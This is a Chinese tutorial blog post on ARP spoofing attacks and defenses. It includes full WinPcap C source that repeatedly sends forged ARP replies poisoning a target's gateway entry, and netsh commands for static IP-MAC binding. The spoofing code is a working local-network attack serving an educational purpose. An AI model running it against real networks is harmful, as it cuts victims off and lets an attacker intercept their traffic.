ARP协议(5)ARP攻击和防护

一、ARP攻击

我们先来看ARP的功能:ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的进行。

ARP的具体实现方式,我在《ARP协议(1)什么是ARP协议》已有说明:

Q:这张映射表是如何生成的?

A:

(1)这张表中,每条记录(非静态)的生存时间一般为20分钟,起始时间从被创建开始算起,一旦过期,将在这张表中删除。(手动删除全部,可以用 arp -d *命令)。

(2)当A主机要发送信息给B时,A先在ARP高速缓存里查询B的IP是否有对应的MAC地址,如果有则把B IP对应的MAC地址取出封装在数据包里,然后发送出去。

(3)如果A在ARP高速缓存里没有找到B IP对应的MAC,则向A所在的局域网内广播或者询问网关(路由):谁有B IP的MAC,请告诉A。

(4)如果B和A是同一个局域网,B回这条信息,并把B的MAC地址带上,A再把B的IP和MAC写入到ARP的高速缓存里(一般有效时间为20分钟)。

(5)如果B和A不是同一个局域网,并且A所在的网关知道(或间接知道(询问和发包))B的MAC,则网关发消息给A,并且带上B的MAC地址。A收到消息后,再把B的IP和MAC写入到ARP的高速缓存里(一般有效时间为20分钟)。

(6)如果没人回应,则超时,对方不可达。

问题出在,在(4)中,如果主机F,向A发出了响应,说A询问IP的MAC是x(并非是正确的B的MAC),A收到后把它写入IP-MAC缓存,以后A向B发请求,全部都到F去了。这就产生了欺骗。

如果主机F伪造的是局域网中网关的MAC,则与F同局域网,被F攻击的主机就上不了网(因为被攻击的主句发向网关的数据包全部奥F主机上了),直到被攻击的主机中IP-MAC缓存过期,获取到正确的网关地址(IP-MAC)。

从上面的分析可以知道,要实现ARP攻击,只要在局域网中向被攻击的主机发送伪造的ARP响应包即可,所以要编码实现也就很简单了。

上篇,已经可以发送ARP数据包:

/*
 功能: src_mac 向局域网广播:target_ip 192.168.1.111 的 mac 是多少
*/
int Text1(Arp *arp)
{
 u_char dest_mac[6] = {0xFF,0xFF,0xFF,0xFF,0xFF,0xFF};// 广播
 u_char src_mac[6] = {0xF0,0x7B,0xCB,0xA3,0x15,0x85};// 源mac地址 F0-7B-CB-A3-15-85
 u_char sender_mac[6] = {0xF0,0x7B,0xCB,0xA3,0x15,0x85}; // 发送端mac F0-7B-CB-A3-15-85
 u_char sender_ip[4] = {0xC0,0xA8,0x01,0x65}; //发送端IP地址 192.168.1.101
 u_char target_mac[6] = {0x00,0x00,0x00,0x00,0x00,0x00}; // 因为不知道mac,所以mac为空
 u_char target_ip[4] = {0xC0,0xA8,0x01,0x6F}; // 目的端ip 192.168.1.111;
 if(PacketArpRequest(arp,dest_mac,src_mac,sender_mac,sender_ip,target_mac,target_ip) == -1)
 {
  printf("Packet arp request error\n");
  return -1;
 }
 return 0;
}

我们只要修改Text1函数里面的这些参数即可,如下:

/*
实验的主机
 xxh_mac: xxh机器的mac
 xxh_ip: xxh机器的ip
 route_mac: 路由器的mac
 route_ip: 路由器的ip
 mobile_mac: 手机的mac
 mobile_ip: 手机的ip
 broadcast: 广播地址
 xl_mac: xl机器的mac
 xl_ip: xl机器的ip
*/
u_char xxh_mac[6] = {0xF0,0x7B,0xCB,0xA3,0x15,0x85};
u_char xxh_ip[4] = {0xC0,0xA8,0x00,0x68};
u_char route_mac[6] = {0x80,0x89,0x17,0xCF,0xE6,0x6E};
u_char route_ip[4] = {0xC0,0xA8,0x00,0x01};
u_char mobile_mac[6] = {0x78,0xA8,0x73,0x82,0xBE,0xA4};
u_char mobile_ip[4] = {0xC0,0xA8,0x00,0x66};
u_char broadcast[6] = {0xFF,0xFF,0xFF,0xFF,0xFF,0xFF};
u_char xl_mac[6] = {0x00,0x21,0x00,0x29,0x75,0x04};
u_char xl_ip[4] = {0xC0,0xA8,0x00,0x6C};//192.168.0.108
/*
 欺骗主机xl
 只告诉xl这台机器,route_ip的Mac是xxh_mac
*/
int Text3(Arp *arp)
{
 //broadcast route_mac route_ip mobile_mac mobile_ip xxh_mac xxh_ip
 if(PacketArpReplay(arp,xl_mac,xxh_mac,xxh_mac,route_ip,xxh_mac,xxh_ip) == -1)
 {
  printf("Packet arp request error\n");
  return -1;
 }
 return 0;
}

把包发出去之后,xl这台机器就无法上网了,我们在查询xl的arp缓存:

从上面看192.168.0.1对应的mac为192.168.0.104的mac了(f0-7b-cb-a3-15-85为xxh192.168.0.104主机的mac),主机xl就再也上不了网了,直到它获取到正确的网关IP-MAC。

ARP攻击的范围:是在局域网中。

ARP攻击可以做:

(1)通过ARP欺骗,我们可以获取到被攻击欲发送的所有数据包。

(2)通过ARP欺骗,可以让被攻击的机器无法正常上网。

居然利用ARP漏洞可以进行攻击,那,还可以做些有益的事么

走在回家的路上,我yy了一种可用方法,但是在实际生产中,也许会用不到,但可以提供为一种思路:

在分布式部署中,如果某台机器出了故障,此时就需要把访问到该机器的流量导向到别的机器,此时ARP就可以排上用场了(怎么用?你该知道了吧?),但是在实际生产环境中,会有更好的解决方案,今后我们在详细来聊。

二、ARP防护

从上面可知,ARP攻击,主要是利用了ARP的漏洞:主机在查询不到IP-MAC缓存,向局域网发出询问请求,从而被不法攻击。

进而可知,攻击的前提是,主机在IP-MAC查询不到,才有被攻击的可能,那如果我在IP-MAC查到了,那就避免了ARP攻击?

对头!

我们之前有说过,ARP缓存的一般有效时间是20分钟,那如何让我们在IP-MAC查到相应的消息呢?

绑定IP-MAC!(有点类似绑定路由的概念)

这张图的最后一列“类型”,有动态和静态。动态就是临时缓存(20分钟),静态就是孤单绑定。

如何绑定?

1、查看网络状态

netsh i i show in

我电脑是活跃可用用的网络适配器的Idx是12

2、设置IP <---> MAC

netsh -c "i i" add neighbors [Idx序号] [ip地址] [mac地址]

如图:

192.168.1.1 与 a8-57-4e-5c-92-56 就绑定了。

对于网络管理员来说,还可以在网关进行绑定,如图:

这个页面是我家的路由器(手机上登录的,所以图片看来比较小)。

上面有提供绑定按钮操作,绑定后,对路由也就比较安全了。

ps:现在想起来,在迅雷的时候,新领的电脑要上网的话,需要把电脑的MAC报给运维同事,然后才可以上网。一直不清楚他们要电脑的MAC干嘛,原来就在于此啊。

同时,也可以装一些ARP防火墙或软件(我猜,他们的原理也不过如此)

好了,整个ARP系列就完成了,大家看得如何,欢迎大家来讨论交流:

公众号,搜索echo,或扫下面的二维码,进行关注交流

源码:

<span style="font-size:14px;">#if 0
#include <stdlib.h>
#include <stdio.h>

// pcap_findalldevs_ex
#define HAVE_REMOTE
#include <pcap.h>

/*
实验的主机
	xxh_mac: xxh机器的mac
	xxh_ip: xxh机器的ip
	route_mac: 路由器的mac
	route_ip: 路由器的ip
	mobile_mac: 手机的mac
	mobile_ip: 手机的ip
	broadcast: 广播地址
	xl_mac: xl机器的mac
	xl_ip: xl机器的ip
*/
u_char xxh_mac[6] = {0xF0,0x7B,0xCB,0xA3,0x15,0x85};
u_char xxh_ip[4] = {0xC0,0xA8,0x00,0x68};

u_char route_mac[6] = {0x80,0x89,0x17,0xCF,0xE6,0x6E};
u_char route_ip[4] = {0xC0,0xA8,0x00,0x01};

u_char mobile_mac[6] = {0x78,0xA8,0x73,0x82,0xBE,0xA4};
u_char mobile_ip[4] = {0xC0,0xA8,0x00,0x66};

u_char broadcast[6] = {0xFF,0xFF,0xFF,0xFF,0xFF,0xFF};

u_char xl_mac[6] = {0x00,0x21,0x00,0x29,0x75,0x04};
u_char xl_ip[4] = {0xC0,0xA8,0x00,0x6C};//192.168.0.108

// 以太网的首部
typedef struct EthHead
{
	u_char dest_mac[6];		// 以太网的目的地址
	u_char src_mac[6];		// 以太网的源地址
	u_char type[2];			// 帧类型 ARP:0x0806
}EthHead;

// ARP数据包
typedef struct ArpMsg
{
	u_char mac_type[2];		// 硬件类型 以太网: 1
	u_char protocal_type[2];	// 协议类型 IP地址:0x0800
	u_char mac_len;			// 硬件地址长度 6
	u_char protocal_len;	// 协议地址长度 4
	u_char op[2];				// 操作字段 ARP请求:1 ARP应答:2 RARP请求:3 RARP应答:4
	u_char sender_mac[6];	// 发送端以太网地址
	u_char sender_ip[4];	// 发送端IP地址
	u_char target_mac[6];	// 目的以太网地址
	u_char target_ip[4];	// 目的IP地址
}ArpMsg;

// 以太网ARP
typedef struct Arp
{
	EthHead eth_head;
	ArpMsg arpmsg;
}Arp;

/*
	函数名: PacketArp
	功	能: 封装ARP包
	参  数:
		arp_req  : Arp类型,出参
		op		 : 操作字段
				   ARP请求:1
				   ARP响应:2
				   RARP请求:3
				   RARP相应:4
		dest_mac : 以太网目的地址
		src_mac	 : 以太网源地址
		sender_mac:发送端以太网地址
		sender_ip : 发送端IP地址
		target_mac: 目的以太网地址
		target_ip : 目的IP地址
	返  回: 0正确,-1错误

*/
int PacketArp(Arp *arp_req, u_char op, u_char dest_mac[6], u_char src_mac[6], u_char sender_mac[6],
						 u_char sender_ip[4], u_char target_mac[6], u_char target_ip[4])
{
	if(arp_req == NULL)
		return -1;
	memcpy(arp_req->eth_head.dest_mac, dest_mac, 6);
	memcpy(arp_req->eth_head.src_mac, src_mac, 6);
	arp_req->eth_head.type[0] = 0x08;
	arp_req->eth_head.type[1] = 0x06;
	//arp_req->eth_head.type = htons(arp_req->eth_head.type);

	arp_req->arpmsg.mac_type[0] = 0x00;
	arp_req->arpmsg.mac_type[1] = 0x01;
	arp_req->arpmsg.protocal_type[0] = 0x08;
	arp_req->arpmsg.protocal_type[1] = 0x00;
	arp_req->arpmsg.mac_len = 0x06;
	arp_req->arpmsg.protocal_len = 0x04;
	arp_req->arpmsg.op[0] = 0x00;
	arp_req->arpmsg.op[1] = op;
	memcpy(arp_req->arpmsg.sender_mac, sender_mac, 6);
	memcpy(arp_req->arpmsg.sender_ip, sender_ip, 4);
	memcpy(arp_req->arpmsg.target_mac, target_mac, 6);
	memcpy(arp_req->arpmsg.target_ip, target_ip, 4);

	return 0;
}

// ARP 请求包
int PacketArpRequest(Arp *arp_req, u_char dest_mac[6], u_char src_mac[6], u_char sender_mac[6],
						 u_char sender_ip[4], u_char target_mac[6], u_char target_ip[4])
{
	return PacketArp(arp_req,0x01,dest_mac,src_mac,sender_mac,sender_ip,target_mac,target_ip);
}

// ARP 响应包
int PacketArpReplay(Arp *arp_req, u_char dest_mac[6], u_char src_mac[6], u_char sender_mac[6],
						 u_char sender_ip[4], u_char target_mac[6], u_char target_ip[4])
{
	return PacketArp(arp_req,0x02,dest_mac,src_mac,sender_mac,sender_ip,target_mac,target_ip);
}

// 打开网络适配器
pcap_if_t* choose_interface()
{
	pcap_if_t *alldevs;
	pcap_if_t *d;
	int inum;
	int i=0;
	char errbuf[PCAP_ERRBUF_SIZE];

    /* Retrieve the device list on the local machine */
    if (pcap_findalldevs_ex(PCAP_SRC_IF_STRING, NULL, &alldevs, errbuf) == -1)
    {
        fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
        exit(1);
    }

    /* Print the list */
    for(d=alldevs; d; d=d->next)
    {
        printf("%d. %s", ++i, d->name);
        if (d->description)
            printf(" (%s)\n", d->description);
        else
            printf(" (No description available)\n");
    }

    if(i==0)
    {
        printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
        return NULL;
    }

    printf("Enter the interface number (1-%d):",i);
    scanf_s("%d", &inum);

    if(inum < 1 || inum > i)
    {
        printf("\nInterface number out of range.\n");
        /* Free the device list */
        pcap_freealldevs(alldevs);
        return NULL;
    }

    /* Jump to the selected adapter */
    for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);

    return d;
}

/*
	xxh(192.168.0.104) 广播: 192.168.0.102 的MAC是多少
	结果:arp -a 没有结果
*/
int Text1(Arp *arp)
{
	u_char dest_mac[6] = {0xFF,0xFF,0xFF,0xFF,0xFF,0xFF};
	u_char src_mac[6] = {0xF0,0x7B,0xCB,0xA3,0x15,0x85};
	u_char sender_mac[6] = {0xF0,0x7B,0xCB,0xA3,0x15,0x85};
	u_char sender_ip[4] = {0xC0,0xA8,0x00,0x68}; //发送端IP地址 192.168.0.104
	u_char target_mac[6] = {0x00,0x00,0x00,0x00,0x00,0x00};
	u_char target_ip[4] = {0xC0,0xA8,0x00,0x66}; //192.168.0.102;

	if(PacketArpRequest(arp,dest_mac,src_mac,sender_mac,sender_ip,target_mac,target_ip) == -1)
	{
		printf("Packet arp request error\n");
		return -1;
	}
	return 0;
}

/*
	全网欺骗
	广播 route_ip 的Mac是 xxh_mac  导致除xxh机器外,
	结果:所有的机器都上了了网络
*/
int Text2(Arp *arp)
{
	//broadcast route_mac route_ip mobile_mac mobile_ip xxh_mac xxh_ip
	if(PacketArpReplay(arp,broadcast,xxh_mac,xxh_mac,route_ip,xxh_mac,xxh_ip) == -1)
	{
		printf("Packet arp request error\n");
		return -1;
	}
	return 0;
}

/*
	欺骗xl
	只告诉xl这台机器,route_ip的Mac是xxh_mac
	结果:所有的机器都上了了网络
*/
int Text3(Arp *arp)
{
	//broadcast route_mac route_ip mobile_mac mobile_ip xxh_mac xxh_ip
	if(PacketArpReplay(arp,xl_mac,xxh_mac,xxh_mac,route_ip,xxh_mac,xxh_ip) == -1)
	{
		printf("Packet arp request error\n");
		return -1;
	}
	return 0;
}

void main(int argc, char **argv)
{
	pcap_t *fp;
	char errbuf[PCAP_ERRBUF_SIZE];
	u_char packet[42];
	int i;

	pcap_if_t *d = choose_interface();
	if(d == NULL)
	{
		exit(1);
	}
	char *source = d->name;

    /* Open the output device */
	if ( (fp= pcap_open(source,            // name of the device
                        100,                // portion of the packet to capture (only the first 100 bytes)
                        PCAP_OPENFLAG_PROMISCUOUS,  // promiscuous mode
                        1000,               // read timeout
                        NULL,               // authentication on the remote machine
                        errbuf              // error buffer
                        ) ) == NULL)
    {
        fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", argv[1]);
        return;
    }

	Arp arp;
	if(Text3(&arp) == -1)
	{
		return ;
	}

	memcpy(packet, (void*)&arp, 42);
    /* Send down the packet */
	while(1)
	{
		if (pcap_sendpacket(fp, packet, 42 /* size */) != 0)
		{
			fprintf(stderr,"\nError sending the packet: %s\n", pcap_geterr(fp));
			return;
		}
		printf("sleep(2000)\n");
		Sleep(2000);
	}

    return;
}

#endif</span><span style="font-size: 14px;">
</span>

版权声明:本文为博主原创文章,未经博主允许不得转载。

时间: 2024-07-30 18:52:14

ARP协议(5)ARP攻击和防护的相关文章

ARP协议及ARP欺骗详解

ARP协议及ARP欺骗详解 地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议.主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址:收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源.ARP缓存是个用来储存IP地址和MAC地址的缓冲区,其本质就是一个IP地址-->MAC地址的对应表,表中每一个条目分别记

浅析ARP协议及ARP攻击

一. ARP数据包结构 (1)硬件类型:指明发送方想知道的硬件接口类型,以太网的值为1:(2)协议类型:指明发送方提供的高层协议类型:它的值为 0x0800 即表示 IP地址.(3)硬件地址长度和协议长度: 指明硬件地址和高层协议地址的长度,这样ARP报文就可以在任意硬件和任意协议的网络中使用:对于以太网上IP地址的ARP请求或应答来说,它们的值分别为6和4.(4)op:操作字段用来表示这个报文的类型,ARP请求为1,ARP响应为2,RARP请求为3,RARP响应为4: ARP协议解析过程: 1

ARP协议(4)ARP编程

之前的几篇文章,分别介绍了 ARP 协议格式,在vs2012里配置winpcap环境,我们该做的准备都已经做完了,现在我们真正来实现了. 一.定义数据结构 根据ARP的协议格式,设计一个ARP协议格式 根据ARP的分组格式,我们知道它有两部分组成: 1.以太网首部,这是数据包在数据链路层上传输所必不可缺的部分,它的后面跟着相关的协议数据包(ARP/IP等) 2.ARP数据包 所以,我们有这么几个数据结构: // 以太网的首部 typedef struct EthHead { u_char des

ARP协议(2)ARP协议格式详解

一.协议格式 ARP协议的格式如下: 分两大块来讲解: 1.红色框起来的是:以太网的首部,共14字节. 这部分是你不管发送什么以太网协议的数据包,它都是需要的,而且是必须的.各字段的说明: 字段 所占字节数 说明 以太网目的地址 6 要向哪台主机发送信息,主机的MAC地址 以太网源地址 6 信息是从哪台机器发送出来的,主机的MAC地址 帧类型 2 表示这是什么类型的数据包.如果是RAP的话,该值为:0x0806 2.蓝色框起来的部分,这就是ARP协议的格式(请求/应答) 字段 所占字节数 说明

ARP协议(3)ARP编程--winpcap&amp;vs2012配置

好,之前说了那么多,终于到了,我们可以操刀的时候了. 在对ARP协议编程前,我们必须要能控制网络适配器(网卡),这个部分就是驱动! "我们要编写网卡驱动?",对,但是,至少我们现阶段不需要.网络上有写好的驱动和开发包,我们拿来就可以用.我这里使用的是winpcap的驱动以及开发包,因此我们首先要安装和搭建我们的编程环境: 1.下载winpcap驱动. 如果是安装了wireshark的话,它就自动帮我们装了winpcap驱动.(wireshark是基于winpcap开发的) http:/

ARP协议(1)什么是ARP协议

这是近期在看<TCP/IP详解>系列书总结出来的,之后会陆续把其他协议部分分享出来. 我尽量以简单易读.易懂的方式呈现出来,但是,由于文笔和水平有限,有些地方也许存在描述上的不足或繁琐或缺失,还请各位看官指出,我会尽量去弥补和更正. 这序列文章,首版是在公众平台发布,同时会同步到csdn(http://my.csdn.net/xiongxianhe),欢迎大家指正和交流. ARP协议,将分以下序列: 1.什么是ARP协议 2.ARP协议格式详解 3.ARP协议编程 4.ARP协议欺骗和攻击 5

Networking - ARP 协议

ARP 协议概述 ARP(Address Resolution Protocol),即地址解析协议,用于把 IP 地址映射到物理地址.网段上的每台主机都维护着一个被称为 ARP Table 或 ARP Cache 的表格,其中包含着网段上其他主机的 IP 地址与物理地址的对应关系.当主机需要向网段上的其他主机发送数据时,它会查看 ARP Cache 来获得目的的物理地址.ARP 缓存是动态变化的.如果要接收数据的地址当前并不存在于 ARP Cache,主机就会广播一个 ARP 请求帧.ARP 请

【网络】ARP协议

其实在网络传输中,分为不同的层次,然后不同的层分类了不同的协议,我们来简单看一下协议的分类图: 今天我来讲解一下APR协议: 什么是ARP协议: 对于APR协议,我们首先需要了解网络IP的概念,在网络层中,IP是网络层的唯一标识,但是对于我们寻找到网络局域后进行通信的具体主机是哪一台,也就是确定具体的接收方主机,我们需要确定双方的MAC帧,也就是物理地址,物理地址才能够真正确定双方的具体对象,IP是针对于网络层而言的唯一性.所以为了避免发送端不知道接收端的MAC地址,所以就出现了ARP协议. A

在实践中深入理解ARP协议

0.说明 在同一个网络(无特别说明,均指以太网络)中进行通信的主机,必须要拥有目标主机的MAC地址才能够正确地将数据发送给目标主机,那么如何知道目标主机的MAC地址呢?可以通过ARP协议.ARP协议就是用来获取目标IP地址所对应的MAC地址的,也就是说,ARP协议可以动态地在三层IP地址和二层MAC地址之间建立一种映射关系.可以用如下示意图来形象表示其作用: 可以看到上面的图示是把ARP协议划分到网络层,也既是认为它是一个网络层的协议,这是出于它为网络层的IP协议提供服务而考虑的.但实际上,由于